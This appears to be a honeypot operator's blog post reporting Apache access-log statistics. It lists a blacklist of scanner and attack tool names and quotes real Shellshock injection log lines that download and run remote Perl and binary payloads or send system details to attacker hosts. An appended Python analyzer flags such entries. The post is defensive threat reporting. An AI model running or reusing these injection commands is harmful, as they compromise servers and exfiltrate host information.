Today I will release some statistics from my honeypot. The data was fetched using the newest version of my Apache analyzer script. The source data is all access logs from 18 April until today.
~/SendMeSpamIDS.py/mypyfwa$ python mypyfwa.py -s /home/jstephan/MidMay.log -l -i 0 -f MidMay
If you want to do some research on your own, here is the source document (GoogleDrive).
extended Blacklist: Wget|Python|sqlmap|curl|apach0day|pma|php|connect|wordpress|wp|zmeu|masscan|morfeus
extended Whitelist: 127.0.0.1|::1
Logged 25 Lines of bad headers
Logged 351 Lines of possible injections
Logged 16 Lines of strange headers
- As always, md5 hashes to the files I have seen in Shell injections can be found within my ClamAV repository on github
- All urls and IPs have been reported to Virustotal and IBM XForce Exchange
Overall statistics
CountryCode overview
Scanner
The favorite tool for scanning Apache servers still seems to be masscan:
masscan/1.0 (https://github.com/robertdavidgraham/masscan)
Shellinjection
These are still my favorites, as you get so much out of them: you see a nice URL and you get some malware you can analyze, pure fun :-)
Some examples:
Perl based:
194.176.119.86 - - [02/May/2015:21:14:22 +0200] "GET / HTTP/1.1" 404 412 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://psychoid.us/non -O /tmp/b.pl;curl -O /tmp/b.pl http://psychoid.us/non;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
other:
46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"
ChinaZ:
121.207.230.74 - - [20/Apr/2015:22:59:37 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -O /tmp/China.Z-taar >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-taar >> /tmp/Run.sh;echo /tmp/China.Z-taar >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://121.207.230.74:911/java -O /tmp/China.Z-taar >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-taar >> /tmp/Run.sh;echo /tmp/China.Z-taar >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Length of request
I have one check which checks the request length. I used a hardcoded size to detect this. Normally nothing good comes from a long request.
- PHP encoded - means that the URL was encoded; please see an older blogpost which explains this sort of attack here
- Wordpress direct - means that this was a direct request against an admin page or such
- connect - means the connect statements I described in an older blogpost here
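As an added illustration of where these categories come from (this is not the post's own mypyfwa.py code), here is a small Python analyzer that parses Apache combined log lines and flags Shellshock-style shell injection, blacklist hits and over-long requests, skipping whitelisted sources. The blacklist and whitelist are the ones listed above; the length threshold, the category names and the sample log lines are constructed assumptions.

```python
import re

# Blacklist/whitelist as listed in the post; the hardcoded length limit is not given there, so 200 is an assumed placeholder.
BLACKLIST = re.compile(r"Wget|Python|sqlmap|curl|apach0day|pma|php|connect|wordpress|wp|zmeu|masscan|morfeus", re.I)
WHITELIST = {"127.0.0.1", "::1"}
SHELLSHOCK = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")  # the "() { :;};" prefix seen in the examples above
MAX_REQUEST_LEN = 200

# Apache combined log format; quoted fields may contain backslash-escaped quotes (\")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def classify(entry):
    """Return every category a parsed entry falls into (a line may hit several)."""
    hits = []
    if SHELLSHOCK.search(entry["referer"]) or SHELLSHOCK.search(entry["ua"]):
        hits.append("shell injection")
    if BLACKLIST.search(" ".join((entry["request"], entry["referer"], entry["ua"]))):
        hits.append("blacklist")
    if len(entry["request"]) > MAX_REQUEST_LEN:
        hits.append("long request")
    return hits

def analyze(lines):
    """Map each category to the source IPs that triggered it; whitelisted hosts are skipped."""
    report = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None or entry["ip"] in WHITELIST:
            continue
        for category in classify(entry):
            report.setdefault(category, []).append(entry["ip"])
    return report

# Constructed sample lines (documentation IP ranges) in the same format as the post's examples
SAMPLE_LINES = [
    '203.0.113.5 - - [02/May/2015:21:14:22 +0200] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    r'198.51.100.7 - - [02/May/2015:21:15:00 +0200] "GET / HTTP/1.1" 404 412 "-" "() { :;}; /bin/bash -c \"echo test\""',
    '192.0.2.9 - - [02/May/2015:21:16:00 +0200] "GET / HTTP/1.1" 404 412 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"',
    '192.0.2.10 - - [02/May/2015:21:17:00 +0200] "GET /' + "A" * 300 + ' HTTP/1.1" 414 0 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [02/May/2015:21:18:00 +0200] "GET /wp-admin/ HTTP/1.1" 200 10 "-" "curl/7.38.0"',
]
```

Calling analyze(SAMPLE_LINES) returns one list of source IPs per category; the benign first line and the whitelisted localhost line produce no entries even though the latter would match the blacklist on "wp" and "curl".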